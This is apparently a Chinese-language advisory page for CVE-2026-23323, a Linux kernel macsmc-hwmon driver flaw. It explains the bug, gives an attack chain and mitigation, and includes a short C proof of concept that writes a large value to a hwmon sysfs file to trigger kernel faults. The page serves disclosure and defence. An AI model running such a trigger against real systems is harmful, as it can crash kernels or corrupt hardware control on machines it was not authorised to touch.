CVE-2026-23323 CVSS 7.8 高危

CVE-2026-23323 Linux内核macsmc驱动越界漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23323

漏洞类型

内存越界访问

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核Apple Silicon SMC硬件监控驱动存在漏洞。电压传感器初始化逻辑错误导致越界内存访问，且浮点数转换存在缺陷。本地低权限攻击者可利用此漏洞破坏系统完整性或导致拒绝服务。

技术细节

该漏洞主要源于Linux内核macsmc-hwmon驱动的两个关键缺陷。首先，在电压传感器初始化循环中，代码错误地使用了“volt-”前缀而非“voltage-”，并且错误地将电压传感器分配给了hwmon->temp.sensors数组，而非hwmon->volt.sensors数组。当系统中同时存在温度和电压传感器时，这种逻辑错误会导致数组越界访问，进而引发内存损坏或系统崩溃。其次，macsmc_hwmon_write_f32()函数中的浮点数转换逻辑存在缺陷，对于大于等于2^24的数值，其指数处理逻辑有误，且未对尾数进行掩码处理。这可能导致向SMC写入错误的数值，破坏硬件监控数据的准确性或导致硬件控制异常。由于攻击向量为本地且需要低权限，本地恶意用户可利用这些缺陷破坏系统稳定性或泄露敏感内存数据。

攻击链分析

STEP 1

获取本地访问权限

攻击者在运行受影响Linux内核版本的Apple Silicon设备上获得低权限用户访问权限。

STEP 2

触发漏洞

攻击者通过访问hwmon驱动接口，读取电压传感器以触发越界内存访问，或写入特定数值触发浮点转换逻辑错误。

STEP 3

造成影响

由于内存越界或数据写入错误，导致系统内核崩溃、数据损坏或潜在的权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * PoC for CVE-2026-23323
 * This PoC attempts to trigger the float conversion bug
 * in macsmc_hwmon_write_f32 by writing a large value
 * to the hwmon sysfs interface.
 */

int main() {
    const char* path = "/sys/class/hwmon/hwmonX/fan1_target"; // Replace X with actual hwmon id
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror("Failed to open hwmon device");
        return 1;
    }

    // Write a large value to trigger exponent logic bug (>= 2^24)
    const char* val = "16777216";
    if (write(fd, val, sizeof(val)) < 0) {
        perror("Failed to write value");
    } else {
        printf("Value written successfully. Check system logs for kernel panics or corruption.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (包含macsmc-hwmon驱动的版本)

防御指南

临时缓解措施

建议立即更新Linux内核版本以修复该漏洞。在未更新前，应严格限制本地系统的用户权限，防止潜在的恶意利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表